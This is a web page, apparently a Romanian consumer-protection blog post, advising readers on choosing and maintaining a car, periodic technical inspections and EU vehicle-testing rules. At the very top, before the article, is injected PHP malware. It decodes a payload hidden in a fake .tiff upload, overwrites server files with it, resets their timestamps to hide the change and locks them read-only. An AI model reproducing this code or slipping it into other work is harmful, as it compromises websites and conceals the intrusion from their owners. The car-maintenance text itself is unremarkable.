$wp_update_file="/home/shuffles/public_html/wp-content/uploads/2023/05/0506412536.tiff"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Protectia-Consumatorilor.ro-o9atitudine! te sfatuieste cum sa iti alegi un autoturism! – O noua atitudine

Mai mult, alegerea unui autoturism trebuie să ţină seama de o serie de caracteristici de sustenabilitate ale acestui produs:
•    Să asigure un nivel ridicat de siguranţă în exploatare;
•    Să aibă motorizare care să utilizeze resurse regenerabile ca alternativă la combustibilii convenţionali;
•    Să fie manevrabil, fiabil şi prietenos cu mediul (producând o cantitate cât mai mică de noxe şi un consum redus de combustibil);
•    Să aibă un design interior şi exterior funcţional, ergonomic şi plăcut.
Intreţinerea maşinii este esenţială pentru buna funcţionare a ei, pentru siguranţa pasagerilor, pentru evitarea producerii de noxe respectiv, crearea unui spaţiu netoxic în habitatul maşinii.
În general atunci când aţi ajuns la numărul de kilometri pentru care producătorul vă recomandă revizia tehnică, înlocuiţi filtrul de aer, filtrul de carburant, filtrul de ulei, filtrul de polen şi uleiul de la motor. Nu uitaţi să verificaţi obligatoriu starea plăcuţelor de frână iar dacă este cazul să le schimbaţi pentru siguranţa dumneavoastră.
La un număr mai mare de kilometri se recomandă schimbarea distribuţiei care constă în schimbarea curelelor de transmisie, a lanţului de transmisie, a rolei întinzătoare şi a pompei de apă.
Pentru maşinile noi, obligatoriu după trei ani de la data înmatriculării se va face Inspecţia Tehnică Periodică (ITP); pentru celelalte maşini se face din doi în doi ani. Această inspecţie certifică buna funcţionare tehnică a maşinii şi este realizată de către atelierele auto autorizate de către Registrul Auto Român.
In interesul siguranţei rutiere, a protecţiei mediului şi concurenţei loiale, este important să se asigure că vehiculele în funcţiune sunt corect întreţinute şi testate, în scopul de a menţine performanţa lor în calitate garantată de omologare de tip, fără degradare excesivă, pe parcursul lor de viaţă timp. Astfel a fost adoptată Directiva Comisiei 2010/48/EU din 05 iulie 2010 cu scopul de adaptare la progresul tehnic a Directivei 2009/40/EC a Parlamentului European şi a Consiliului privind inspecţia tehnică auto pentru autovehicule şi remorcile acestora.
57% dintre victimele accidentelor rutiere fatale sunt reprezentate chiar de ocupanţii autovehicolului. Din această cauză este necesară susţinerea unui progres tehnic constant în asigurarea securităţii vehiculelor. Din acest punct de vedere, Comisia Europeană va continua să suţină programul de teste EuroNCAP (Programul European de testare a maşinilor noi/ The European New Car Assessment Programme) pentru a se asigura că toate maşinile noi sunt verificate în conformitate cu protocoalele de testare armonizate şi, pentru a informa în consecinţă pe consumatori, concomitent cu ridicarea gradului de conştientizare a riscului.

By o9admin